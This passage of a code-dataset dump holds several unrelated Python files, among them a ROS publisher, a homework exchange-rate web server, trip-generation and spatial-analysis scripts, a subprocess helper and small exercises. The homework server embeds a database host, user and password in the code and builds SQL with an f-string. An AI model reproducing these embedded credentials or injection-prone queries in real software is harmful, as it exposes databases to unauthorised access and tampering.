p = People()\n p.header.frame_id = \"/map\"\n p.header.stamp = rospy.Time.now()\n self.pub.publish(p)\n\n g = Groups()\n g.header.frame_id = \"/map\"\n g.header.stamp = rospy.Time.now()\n self.pubg.publish(g)\n\n def run_behavior(self):\n while not rospy.is_shutdown():\n if self.pose_received:\n self.pose_received = False\n\n if self.map_received:\n #self.map_received = False\n\n self.publish()\n \n\nif __name__ == '__main__':\n people_publisher = PeoplePublisher()\n people_publisher.run_behavior()\n eng.quit()","sub_path":"scripts/people_publisher_obstacles_vision.py","file_name":"people_publisher_obstacles_vision.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424348518","text":"#!/usr/bin/env python3\nfirst_name = \"Casey\"\nlast_name = \"Jackson\"\nfull_name = first_name + last_name\nprint(full_name)\nfullName = \"Casey\" \" \" \"Jackson\"\nprint(fullName)\n\nstars = \"*\" * 12\npounds = 5 * \"#\"\nprint(stars, \":\", pounds)\nx = \"Hello there\"\nprint('t' in x, 'ell' in x, 'hell' in x)\n","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319733162","text":"# CS39AB - Cloud Computing - Summer 2021\n# Instructor: Thyago Mota\n# Description: Activity 11 - Extract the dollar to real exchange rate, saving it into a database. All quotes are then displayed using a dynamically generated web page. 
\n\nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nEXCHANGE_RATE_URL = 'https://themoneyconverter.com/USD/BRL'\n\nclass MyHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n\n # only accept self.path = \"/\"\n if self.path != '/':\n return \n\n # get quote and update db\n req = requests.get(EXCHANGE_RATE_URL)\n soup = BeautifulSoup(req.content, 'html.parser')\n el = soup.find('output')\n exch_rate = float(el.text.split(' ')[3])\n today = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n sql = f\"INSERT INTO quotes VALUES ('{today}', {exch_rate})\"\n cursor = self.db.cursor()\n cursor.execute(sql)\n db.commit()\n\n # generate a response\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n self.wfile.write(bytes('''\n \n \n Dollar to Real\n \n \n ''', \"utf-8\"))\n self.wfile.write(bytes('''\n \n \n \n \n \n \n \n \n \n \n ''', \"utf-8\"))\n sql = \"SELECT `datetime`, quote FROM quotes ORDER BY `datetime` DESC\"\n cursor = self.db.cursor(buffered = True)\n cursor.execute(sql)\n for date_time, quote in cursor:\n date = date_time.date()\n time = date_time.time()\n self.wfile.write(bytes(f\"\", \"utf-8\")) \n self.wfile.write(bytes('''\n \n
DateTimeExchange Rate
{date}{time}{quote}
\n \n \n ''', \"utf-8\"))\n\nif __name__ == \"__main__\":\n\n # delete the following lines once you are satisfied with the db connection and before creating the docker image\n os.environ['DB_HOST'] = 'dollar2real.cvhpjdm21h9e.us-west-1.rds.amazonaws.com'\n os.environ['DB_NAME'] = 'dollar2real'\n os.environ['DB_USER'] = 'dollar2real'\n os.environ['DB_PASSWORD'] = '135791'\n\n # attempt to connect to MySQL\n db = mysql.connector.connect(\n host = os.getenv('DB_HOST'),\n database = os.getenv('DB_NAME'),\n user = os.getenv('DB_USER'),\n password = os.getenv('DB_PASSWORD')\n )\n\n # attempt to start a web server\n my_handler = MyHandler \n my_handler.db = db\n webServer = HTTPServer(('0.0.0.0', 8000), my_handler)\n print(\"Ready to serve!\")\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n db.close()","sub_path":"hwk_04_docker/src/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161760878","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Spatial AutoCorrelation - Run Script\n ~~~~~~~~~\n\n Run with:\n python run_morans.py shapefiles/my_shapes.shp \\\n 'Density_Col' 'Population_Col' 'etc_col' -f 'Filter_Col'\n\n :copyright: (c) 2015 by Joe Hand, Santa Fe Institute.\n :license: MIT\n\"\"\"\nimport argparse\nimport logging\nimport pickle\nimport time\n\nfrom datetime import timedelta\n\nimport pandas as pd\n\nfrom spatial_auto import run_moran_analysis\n\nparser = argparse.ArgumentParser(\n description=\"Run Moran's on Shapefile (optional filter)\")\nparser.add_argument('shapefile', type=str,\n help='source shapefile for analysis')\nparser.add_argument('analysis_vars', nargs='+',\n help='columns to run Morans I analysis on')\nparser.add_argument('-f', '--filter', type=str,\n help='Filter Shapefile by Column (Optional)')\nparser.add_argument('--show-logs', dest='log', action='store_true')\nparser.add_argument('--no-logs', dest='log', action='store_false')\nparser.set_defaults(log=True)\nparser.add_argument('--logs-file', dest='log_file', action='store_true')\nparser.set_defaults(log_file=False)\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n t = time.process_time()\n if args.log_file:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n filename='morans.log', level=logging.DEBUG,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n elif args.log:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n level=logging.DEBUG,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n else:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n level=logging.WARNING,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n if args.filter:\n filter_col = args.filter\n else:\n filter_col = None\n\n logging.info('Starting Analysis')\n try:\n results = run_moran_analysis(\n args.shapefile, args.analysis_vars, filter_column=filter_col)\n pickle.dump(results, open( \"results.p\", \"wb\" ))\n except (SystemExit, KeyboardInterrupt):\n raise\n except Exception as e:\n logging.exception('\\n\\nError: ')\n\n logging.info('Finished Calculations \\n\\n')\n\n try:\n results_df = []\n keys = []\n for shapefile, values in results:\n df = pd.DataFrame(values).transpose()\n if shapefile in keys:\n val = 1\n while True:\n shapefile = '{}_{}'.format(shapefile,val)\n if shapefile not in keys:\n break\n val += 1\n keys.append(shapefile)\n del(df['COLUMN']) # add this as a key later\n results_df.append(df)\n\n results_log = '{} RESULTS 
\\n'.format(shapefile.upper())\n results_log += df.to_string()\n results_log += '\\n'\n logging.debug(results_log)\n results_df = pd.concat(results_df, keys=keys, names=['CITY', 'COLUMN'], axis=0)\n results_df.to_csv('results.csv')\n except:\n logging.exception('Some error exporting results: ')\n logging.debug('Total elapsed time {}'.format(\n str(timedelta(seconds=time.process_time() - t))))\n","sub_path":"run_morans.py","file_name":"run_morans.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"199735316","text":"import copy\nimport datetime\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef smoothen_triplegs(triplegs, method='douglas-peucker', tolerance=1.0):\n \"\"\"reduces number of points while retaining structure of tripleg\n Parameters\n ----------\n triplegs: shapely file\n triplegs to be reduced\n method: method used to smoothen\n only the douglas-peucker method is available so far\n tolerance: float\n a higher tolerance removes more points; the units of tolerance are the same as the projection of the input geometry\n \"\"\"\n input_copy = copy.deepcopy(triplegs)\n origin_geom = input_copy.geom\n simplified_geom = origin_geom.simplify(tolerance, preserve_topology=False)\n input_copy.geom = simplified_geom\n\n return input_copy\n\ndef _temp_trip_stack_has_tripleg(temp_trip_stack):\n \"\"\"\n Check if a trip has at least 1 tripleg\n Parameters\n ----------\n temp_trip_stack : list\n list of dictionary like elements (either pandas series or\n python dictionary). Contains all elements\n that will be aggregated into a trip\n\n Returns\n -------\n Bool\n \"\"\"\n\n has_tripleg = False\n for row in temp_trip_stack:\n if row['type'] == 'tripleg':\n has_tripleg = True\n break\n\n return has_tripleg\n\n\ndef _create_trip_from_stack(temp_trip_stack, origin_activity, destination_activity):\n \"\"\"\n Aggregate information of trip elements in a structured dictionary\n\n Parameters\n ----------\n temp_trip_stack : list\n list of dictionary like elements (either pandas series or python dictionary). 
Contains all elements\n        that will be aggregated into a trip\n    origin_activity : dictionary like\n        Either dictionary or pandas series\n    destination_activity : dictionary like\n        Either dictionary or pandas series\n\n    Returns\n    -------\n    dictionary\n\n    \"\"\"\n\n    # this function returns an empty dict if no tripleg is in the stack\n    first_trip_element = temp_trip_stack[0]\n    last_trip_element = temp_trip_stack[-1]\n\n    # all data has to be from the same user\n    assert origin_activity['user_id'] == last_trip_element['user_id']\n\n    # double check if trip requirements are fulfilled\n    assert origin_activity['activity'] == True\n    assert destination_activity['activity'] == True\n    assert first_trip_element['activity'] == False\n\n    trip_dict_entry = {'user_id': origin_activity['user_id'],\n                       'started_at': first_trip_element['started_at'],\n                       'finished_at': last_trip_element['finished_at'],\n                       'origin_staypoint_id': origin_activity['id'],\n                       'destination_staypoint_id': destination_activity['id'],\n                       'tpls': [tripleg['id'] for tripleg in temp_trip_stack if tripleg['type'] == 'tripleg'],\n                       'spts': [tripleg['id'] for tripleg in temp_trip_stack if tripleg['type'] == 'staypoint']}\n    \n    return trip_dict_entry\n\n\ndef generate_trips(stps_input, tpls_input, gap_threshold=15, id_offset=0, print_progress=False):\n    \"\"\" Generate trips based on staypoints and triplegs\n\n    `generate_trips` aggregates the staypoints `stps_input` and the triplegs `tpls_input` into `trips` which are returned\n    in a new DataFrame. The function returns new versions of `stps_input` and `tpls_input` that are identical except\n    for additional ids that allow the matching between staypoints, triplegs and trips.\n\n    Parameters\n    ----------\n    stps_input : GeoDataFrame\n        Staypoints that are used for the trip generation\n    tpls_input : GeoDataFrame\n        Triplegs that are used for the trip generation\n    gap_threshold : float\n        Maximum allowed temporal gap size in minutes. If tracking data is missing for more than `gap_threshold`\n        minutes, then a new trip begins after the gap.\n    id_offset : int\n        IDs for trips are incremented starting from this value.\n\n    Returns\n    -------\n    (GeoDataFrame, GeoDataFrame, GeoDataFrame)\n        the tuple contains (staypoints, triplegs, trips)\n\n    Notes\n    -----\n    Trips are an aggregation level in transport planning that summarize all movement and all non-essential actions\n    (e.g., waiting) between two relevant activities.\n    The function returns altered versions of the input staypoints and triplegs. Staypoints receive the fields\n    [`trip_id` `prev_trip_id` and `next_trip_id`], triplegs receive the field [`trip_id`].\n    The following assumptions are implemented:\n        - All movement before the first and after the last activity is omitted\n        - If we do not record a person for more than `gap_threshold` minutes, we assume that the person performed\n          an activity in the recording gap and split the trip at the gap.\n        - Trips that start/end in a recording gap can have an unknown origin/destination\n        - There are no trips without a (recorded) tripleg\n\n    Examples\n    ---------\n    >>> staypoints, triplegs, trips = generate_trips(staypoints, triplegs)\n\n    \"\"\"\n    assert 'activity' in stps_input.columns, \"staypoints need the column 'activity' \\\n to be able to generate trips\"\n\n    # we copy the input because we need to add a temporary column\n    tpls = tpls_input.copy()\n    spts = stps_input.copy()\n\n    tpls['type'] = 'tripleg'\n    spts['type'] = 'staypoint'\n\n    # create table with relevant information from triplegs and staypoints.\n    spts_tpls = spts[['started_at', 'finished_at', 'user_id', 'type', 'activity']].append(\n        tpls[['started_at', 'finished_at', 'user_id', 'type']])\n\n    # create ID field from index\n    spts_tpls['id'] = spts_tpls.index\n\n    # transform nan to bool\n    spts_tpls['activity'] = spts_tpls['activity'] == True\n\n    spts_tpls.sort_values(by=['user_id', 'started_at'], inplace=True)\n    spts_tpls['started_at_next'] = spts_tpls['started_at'].shift(-1)\n    spts_tpls['activity_next'] = spts_tpls['activity'].shift(-1)\n    \n    if print_progress:\n        tqdm.pandas(desc='User trip generation')\n        trips = spts_tpls.groupby(['user_id'], \n                                  group_keys=False, \n                                  as_index=False).progress_apply(_generate_trips_user, gap_threshold=gap_threshold).reset_index(drop=True)\n    else:\n        trips = spts_tpls.groupby(['user_id'], \n                                  group_keys=False, \n                                  as_index=False).apply(_generate_trips_user, gap_threshold=gap_threshold).reset_index(drop=True)\n    trips['id'] = trips.index + id_offset\n    \n    # assign trip_id to tpls\n    trip2tpl_map = trips[['id', 'tpls']].set_index('id').to_dict()['tpls']\n    ls = []\n    for key, values in trip2tpl_map.items():\n        for value in values:\n            ls.append([value, key])\n    temp = pd.DataFrame(ls, columns=[tpls.index.name, 'trip_id']).set_index(tpls.index.name)\n    tpls = tpls.join(temp, how='left')\n    \n    # assign trip_id to spts, for non-activity spts\n    trip2spt_map = trips[['id', 'spts']].set_index('id').to_dict()['spts']\n    ls = []\n    for key, values in trip2spt_map.items():\n        for value in values:\n            ls.append([value, key])\n    temp = pd.DataFrame(ls, columns=[spts.index.name, 'trip_id']).set_index(spts.index.name)\n    spts = spts.join(temp, how='left')\n    \n    # assign prev_trip_id to spts\n    temp = trips[['id', 'destination_staypoint_id']].copy()\n    temp.rename(columns={\"id\":\"prev_trip_id\", \"destination_staypoint_id\":spts.index.name}, inplace=True)\n    temp.set_index(spts.index.name, inplace=True)\n    spts = spts.join(temp, how ='left')\n    \n    # assign next_trip_id to spts\n    temp = trips[['id', 'origin_staypoint_id']].copy()\n    temp.rename(columns={\"id\":\"next_trip_id\", \"origin_staypoint_id\":spts.index.name}, inplace=True)\n    temp.set_index(spts.index.name, inplace=True)\n    spts = spts.join(temp, how ='left')\n    \n    # final cleaning\n    tpls.drop(columns=['type'], inplace=True)\n    spts.drop(columns=['type'], inplace=True)\n    trips.drop(columns = ['tpls', 'spts'], inplace=True)\n    trips.set_index('id', inplace=True)\n    \n    return spts, tpls, trips\n\ndef _generate_trips_user(df, gap_threshold):\n    # function called after groupby: should only contain records of one user\n    user_id = df['user_id'].unique()\n    assert len(user_id) == 1\n    user_id = user_id[0]\n\n    unknown_activity = {'user_id': user_id, 'activity': True, 'id': np.nan}\n    origin_activity = unknown_activity\n    temp_trip_stack = []\n    in_trip = False\n    trip_ls = []\n\n    for _, row in df.iterrows():\n        \n        \n        # check if we can start a new trip\n        # (we make sure that we start the trip with the most recent activity)\n        if in_trip is False:\n            # If there are several activities in a row, we skip until the last one\n            if row['activity'] and row['activity_next']:\n                continue\n\n            # if this is the last activity before the trip starts, reset the origin\n            elif row['activity']:\n                origin_activity = row\n                in_trip = True\n                continue\n\n            # if for non-activities we simply start the trip\n            else:\n                in_trip = True\n        \n        if in_trip is True:\n            # during trip generation/recording\n\n            # check if trip ends regularly\n            if row['activity'] is True:\n\n                # if there are no triplegs in the trip, set the current activity as origin and start over\n                if not _temp_trip_stack_has_tripleg(temp_trip_stack):\n                    origin_activity = row\n                    temp_trip_stack = list()\n                    in_trip = True\n\n                else:\n                    # record trip\n                    destination_activity = row\n                    trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity, destination_activity))\n\n                    # set values for next trip\n                    if row['started_at_next'] - row['finished_at'] > datetime.timedelta(minutes=gap_threshold):\n                        # if there is a gap after this trip the origin of the next trip is unknown\n                        origin_activity = unknown_activity\n                        destination_activity = None\n                        temp_trip_stack = list()\n                        in_trip = False\n\n                    else:\n                        # if there is no gap after this trip the origin of the next trip is the destination of the\n                        # current trip\n                        origin_activity = destination_activity\n                        destination_activity = None\n                        temp_trip_stack = list()\n                        in_trip = False\n\n            # check if gap during the trip\n            elif row['started_at_next'] - row['finished_at'] > datetime.timedelta(minutes=gap_threshold):\n                # in case of a gap, the destination of the current trip and the origin of the next trip\n                # are unknown.\n\n                # add current item to trip\n                temp_trip_stack.append(row)\n\n                # if the trip has no recorded triplegs, we do not generate the current trip.\n                if not _temp_trip_stack_has_tripleg(temp_trip_stack):\n                    origin_activity = unknown_activity\n                    in_trip = True\n                    temp_trip_stack = list()\n\n                else:\n                    # add tripleg to trip, generate trip, start new trip with unknown origin\n                    destination_activity = unknown_activity\n\n                    trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity, destination_activity))\n                    origin_activity = unknown_activity\n                    destination_activity = None\n                    temp_trip_stack = list()\n                    in_trip = True\n\n            else:\n                temp_trip_stack.append(row)\n    \n    # if the user's data ends, generate the last trip with an unknown destination\n    if (len(temp_trip_stack) > 0) and (_temp_trip_stack_has_tripleg(temp_trip_stack)):\n        destination_activity = unknown_activity\n        trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity, destination_activity))\n    \n    # print(trip_ls)\n    trips = pd.DataFrame(trip_ls)\n    return trips","sub_path":"trackintel/preprocessing/triplegs.py","file_name":"triplegs.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"315578951","text":"\"\"\"Helper functions to deal with subprocess\"\"\"\n\nimport os\nimport logging\nimport subprocess\nimport select\nimport time\nimport errno\nimport commands\ntry:\n    import fcntl\nexcept 
ImportError:\n    pass\n\n\n# http://stackoverflow.com/questions/12270645/can-you-make-a-python-subprocess-output-stdout-and-stderr-as-usual-but-also-cap\n# !!! it won't work on Windows. select() accepts sockets only on Windows\ndef run(process, check=True, show_cmd=False):\n    \"\"\"Run a Linux process and log stdout as debug, stderr as warning.\n    Throw an exception if the process failed (returned non-zero)\n    process - the process that should run\n    check - by default the process exit status is checked to raise RuntimeError\n            if the exit status is not zero.\n    show_cmd - by default the command to run is logged as DEBUG. Set it to True\n            to log it as INFO, which normally also prints it to the console.\n    The exit status will be returned as the function's return value.\n    \"\"\"\n\n    if show_cmd:\n        logging.info(process)\n    else:\n        logging.debug(process)\n\n    p = subprocess.Popen(process, shell=True,\n                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n    # deal with subprocess output in another function\n    # to avoid pylint warning Too many branches\n    _nonblocking_read(p.stdout.fileno(), p.stderr.fileno(), _1, _2)\n\n    returncode = p.wait()\n    returnmsg = \"\"\"Call subprocess probably failed.\n    The command line is {process}\n    The return code is {retcode}\"\"\".format(process=process, retcode=returncode)\n\n    if check and returncode:\n        logging.debug(returnmsg)\n        raise RuntimeError(returnmsg)\n    elif returncode:\n        logging.debug(returnmsg)\n\n    return returncode\n\n\n# keep these function names short to avoid messing up the logging in this file\n# a function name starting with '_' means it is an internal function\ndef _1(line):\n    \"\"\"Log output line as debug\"\"\"\n    logging.debug(line.rstrip())\n\n\ndef _2(line):\n    \"\"\"Log output line as warning\"\"\"\n    logging.warning(line.rstrip())\n\n\ndef _nonblocking_read(stdout_fd, stderr_fd, stdout_callback, stderr_callback, timeout=15):\n    \"\"\"Read stdout and stderr simultaneously. This avoids the deadlock if the child\n    process generates enough output to a stdout or stderr pipe such that it blocks\n    waiting for the OS pipe buffer to accept more data.\n    \"\"\"\n    stdout_eof = False\n    stderr_eof = False\n    _set_nonblocking(stdout_fd)\n    _set_nonblocking(stderr_fd)\n\n    while True:\n        rlist, _, _ = select.select([stdout_fd, stderr_fd], [], [])\n\n        for fd in rlist:\n            if fd == stdout_fd and not stdout_eof:\n                line = _readline_with_timeout(stdout_fd, timeout)\n                if line:\n                    stdout_callback(line)\n                else:\n                    stdout_eof = True\n            if fd == stderr_fd and not stderr_eof:\n                line = _readline_with_timeout(stderr_fd, timeout)\n                if line:\n                    stderr_callback(line)\n                else:\n                    stderr_eof = True\n\n        if stdout_eof and stderr_eof:\n            break\n\n\ndef _set_nonblocking(fd):\n    \"\"\"Turn fd into non blocking mode.\n    Note afterward do not use python file object any more!\n    \"\"\"\n    flags = fcntl.fcntl(fd, fcntl.F_GETFL)\n    fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)  # pylint: disable=no-member\n\n\ndef _readline_with_timeout(fd, timeout=15):\n    \"\"\"file.readline with timeout. Read until '\\n' or until timeout, and return the\n    read content. fd must be turned into non blocking mode. So do not use python\n    file object any more! The advantage over file.readline is to avoid blocking\n    if the subprocess does not output '\\n' for a long time.\n    The default timeout value is well tuned so that a user should see some output before\n    he loses his patience and thinks the subprocess is just \"dead\".\n    \"\"\"\n    content = _readline_non_blocking(fd)  # fd must be readable, so read it anyway\n    if content:\n        while content[-1] != '\\n' and timeout > 0:\n            start = time.time()\n            rlist, _, _ = select.select([fd], [], [], timeout)\n            end = time.time()\n            timeout = timeout - (end - start)\n            if rlist:\n                tmp = _readline_non_blocking(fd)\n                if tmp:\n                    content += tmp\n            else:\n                break\n    return content\n\n\ndef _readline_non_blocking(fd):\n    \"\"\"Called internally by _readline_with_timeout. Best effort read until '\\n'.\n    Assume select was called before so that fd really has something to read!\n    \"\"\"\n    content = ''\n    while True:\n        try:\n            tmp = os.read(fd, 1)\n            if tmp:\n                content += tmp\n                if tmp == '\\n':\n                    break\n            else:\n                break\n        except OSError as err:\n            if err.errno == errno.EAGAIN:\n                assert content  # because by selecting fd, we know it must have content\n                break\n            else:\n                break\n    return content\n\n\ndef getoutput(cmd):\n    \"\"\"A thin wrapper for commands.getoutput\"\"\"\n    logging.debug('Exec shellcmd: ' + cmd)\n    output = commands.getoutput(cmd)\n    logging.debug('The output is: ' + output)\n    return output\n\n\ndef getstatus(cmd):\n    \"\"\"A thin wrapper for os.system\"\"\"\n    logging.debug('Exec shellcmd: ' + cmd)\n    status = os.system(cmd)\n    logging.debug('The exit stat: ' + str(status))\n    return status\n\n\ndef getstatusoutput(cmd):\n    \"\"\"A thin wrapper for commands.getstatusoutput\"\"\"\n    logging.debug('Exec shellcmd: ' + cmd)\n    (status, output) = commands.getstatusoutput(cmd)\n    logging.debug('The output is: ' + output)\n    logging.debug('The exit stat: ' + str(status))\n    return (status, output)\n","sub_path":"rda-base/src/main/python/apitools/subprocess_util.py","file_name":"subprocess_util.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284182653","text":"'''\r\n    Shopping mall:\r\n    1. initialize the wallet balance\r\n    2. push an empty shopping cart\r\n    3. normal shopping:\r\n        enter the product number\r\n        check whether the product exists\r\n        if it exists:\r\n            check whether the money is enough\r\n            if enough:\r\n                add it to the shopping cart\r\n                subtract the matching amount from the balance\r\n            if not enough:\r\n                friendly reminder: you are broke, stop messing around! please buy another product\r\n        if it does not exist:\r\n            buy another product, stop messing around!\r\n    4. print the shopping receipt\r\n    tasks:\r\n    1. fix the duplicated products printed on the shopping receipt\r\n    2. 10 Lenovo computer coupons at 0.5, 20 Laoganma coupons at 0.1, 15 Huawei coupons at 0.6;\r\n       randomly draw one coupon, apply its discount at checkout, then settle the bill.\r\n'''\r\nshop = [\r\n    [\"联想电脑\",5000],\r\n    [\"苹果电脑\",12000],\r\n    [\"华为手环\",2000],\r\n    [\"机械革命\",15000],\r\n    [\"老 干 妈\",7.5],\r\n    [\"卫龙辣条\",3],\r\n    [\"西 瓜\",2]\r\n]\r\n\r\n\r\n# 1. an empty shopping cart\r\nmycart = []\r\n\r\n# 2. initialize your balance\r\nmoney = input(\"请充值购物卡:\")\r\nmoney = int(money)\r\nmoney_1 = money\r\n# randomly draw a coupon\r\nimport random\r\nbond = random.randint(1,45)\r\nif bond >=1 and bond <=10:\r\n    print(\"恭喜获得联想电脑5折优惠券,购买时自动使用\")\r\n    price = 5000\r\n    rebat = 0.5\r\n    bout = 1\r\n    num = 0\r\nelif bond > 10 and bond <=30:\r\n    print(\"恭喜获得:老干妈 1折优惠券,购买时自动使用\")\r\n    price = 7.5\r\n    rebat = 0.1\r\n    bout = 1\r\n    num = 4\r\nelse:\r\n    print(\"恭喜获得:华为手环 6折优惠券,购买时自动使用\")\r\n    price = 2000\r\n    rebat = 0.6\r\n    bout = 1\r\n    num = 2\r\n\r\n# 3. normal shopping\r\ni = 1\r\nwhile i <= 20:\r\n    # display the products\r\n    for key, value in enumerate(shop):\r\n        print(key, value)\r\n    chose = input(\"请输入您想要的商品:\")\r\n    if chose.isdigit():\r\n        chose = int(chose)\r\n        if chose >= len(shop):  # the index must stay within range\r\n            print(\"没有该号商品!请重新输入!\")\r\n        else:\r\n            # check whether there is enough money\r\n            if money > shop[chose][1]:\r\n                mycart.append(shop[chose])\r\n                # use the coupon\r\n                if chose == num and bout > 0 :\r\n                    rebat_=(shop[chose][1]) * (1 - rebat)\r\n                    bout = bout - 1\r\n                    print(\"该商品已使用优惠券优惠了:\",rebat_,\"元\")\r\n                else:\r\n                    rebat_ = 0\r\n                money = money - (shop[chose][1]) + rebat_  # subtract the price\r\n                print(\"恭喜,添加成功!您的余额还剩\",money)\r\n            else:\r\n                print(\"穷鬼,钱不够了,别瞎弄!买其他商品吧!\")\r\n    elif chose == \"q\" or chose == \"Q\":\r\n        print(\"结算中……\")\r\n        break  # break out of the loop\r\n    else:\r\n        print(\"对不起,您输入错误,别瞎弄!\")\r\n\r\n    i = i + 1\r\n\r\n# remove duplicated receipt lines\r\n\r\n\r\n\r\nprint(\"以下是您的购物小条,请拿好!\")\r\nprint(\"-------------------------------------\")\r\nprint(\"编号 商品 单价 数量 合计\")\r\n# count how many times each product appears\r\nfor h in range(len(shop)):\r\n    sum = 0\r\n    for key, value in enumerate(mycart):\r\n        if value[1] == shop[h][1]:\r\n            sum += 1\r\n    if sum > 1:\r\n        print(h,\"\\t\",shop[h][0],\"\\t\", shop[h][1],\"\\t\", sum,\"\\t\\t\",((shop[h][1])*sum))\r\n    if sum == 1:\r\n        print(h,\"\\t\", shop[h][0],\"\\t\", shop[h][1],\"\\t\",sum,\"\\t\\t\",((shop[h][1])*sum))\r\n\r\n\r\nprint(\"-------------------------------------\")\r\nif bout == 0:\r\n    print(\"本次优惠券优惠:\",(price*(1-rebat)),)\r\nprint(\"您本次消费:\",(money_1 - money),\"元\")\r\nprint(\"您的余额还剩:\",money,\"元\")\r\nprint(\"欢迎下次光临!\")\r\n","sub_path":"交互型商城系统.py","file_name":"交互型商城系统.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167415141","text":"#!/usr/bin/env python\r\n\r\nimport os\r\nimport sys\r\nimport logging\r\nfrom argparse import ArgumentParser\r\n\r\n#============================= Function =================================\r\n##logging info\r\nDEBUG=\"\" #change it when debugging\r\nlogFormat = \"%(asctime)s [%(levelname)s] %(message)s\"\r\nlevel = \"DEBUG\" if DEBUG != \"\" else \"INFO\"\r\nlogging.basicConfig( stream=sys.stderr, level=level, format=logFormat )\r\n#========================================================================\r\n\r\ndef checkDir(Dirname):\r\n    logging.info(\"Checking folder: '%s'\" % Dirname)\r\n    dirname = os.path.abspath(Dirname)\r\n    if not os.path.isdir(dirname):\r\n        logging.error(\"Oops! Folder: '%s' does not exist. Please check!\" % Dirname)\r\n        sys.exit(-1)\r\n    if not os.access(dirname, os.W_OK):\r\n        logging.error(\"Oops! Folder: '%s' is not writable. 
Please check!\" % Dirname)\r\n sys.exit(-1)\r\n\r\ndef checkFile(Filename):\r\n logging.info(\"Checking file: '%s'\" % Filename)\r\n filename = os.path.abspath(Filename)\r\n if not os.path.isfile(filename):\r\n logging.error(\"Oops! File: '%s' does not exit. Please check!\" % Filename)\r\n sys.exit(-1)\r\n if not os.access(filename, os.R_OK):\r\n logging.error(\"Oops! File: '%s' is not readable. Please check!\" % Filename)\r\n sys.exit(-1)\r\n\r\n\r\ndef renameFastaHeader(fasta, sampleName, delimiter, outDir):\r\n checkFile(fasta)\r\n checkDir(outDir)\r\n name = fasta.rsplit('.', 1)[0]\r\n fasta = os.path.abspath(fasta)\r\n outDir = os.path.abspath(outDir)\r\n outputfile = os.path.join(outDir, '%s.headerModified.fa' % name)\r\n logging.info(\"Start to rename the header ...\")\r\n with open (outputfile, 'w') as fd:\r\n with open (fasta, 'r') as fa:\r\n for line in fa: \r\n line = line.strip()\r\n if line.startswith(\">\"):\r\n line=\">%s%s%s\" % (sampleName, delimiter, line[1:])\r\n fd.write('%s\\n' % line)\r\n logging.info(\"Complete rename the header ...\")\r\n\r\n\r\nif __name__==\"__main__\":\r\n parser = ArgumentParser(description='rename the header of a given fasta file')\r\n parser.add_argument('--version', action='version', version='1.0')\r\n parser.add_argument('-f', dest='fasta', help='a fasta format file', type = str)\r\n parser.add_argument('-n', dest='name', help='name of the sample', type = str)\r\n parser.add_argument('-d', dest='delim', help=\"delimiter. Default: '||'\", type = str)\r\n parser.add_argument('-o', dest='output', help='the output directory', type=str)\r\n args = parser.parse_args()\r\n\r\n if None in [args.fasta, args.name, args.output]:\r\n print(parser.print_help())\r\n exit(-1)\r\n if args.delim == None:\r\n args.delim = \"||\"\r\n renameFastaHeader(args.fasta, args.name, args.delim, args.output)\r\n \r\n\r\n","sub_path":"panGraphViewerApp/scripts/renameFastaHeader.py","file_name":"renameFastaHeader.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186118343","text":"import random\ndef swap(elementList, indexSwap1, indexSwap2):\n elementList[indexSwap1], elementList[indexSwap2] = elementList[indexSwap2], elementList[indexSwap1]\n\ndef quicksort(a,low=0, high=-1, worst = False):\n global globalCount\n if high == -1:\n high = len(a) -1\n if low < high:\n if worst:\n swap(a,low, a.index(min(a[low:high+1])))\n else:\n swap(a,low, random.randint(low,high))\n\n pivot = low\n for j in range(low+1,high+1):\n globalCount += 1\n if a[j] < a[low]:\n pivot += 1\n swap(a,pivot,j)\n swap(a,low,pivot)\n if pivot > 0:\n quicksort(a,low,pivot-1)\n quicksort(a,pivot+1,high)\n\nglobalCount = 0\nunsortedList = list(random.randint(0,10001) for _ in range(10001))\nquicksort(unsortedList)\nprint(globalCount)\n\nglobalCount = 0\nquicksort(unsortedList, worst=True)\nprint(globalCount)\n\n","sub_path":"2.5.py","file_name":"2.5.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397369557","text":"\nimport 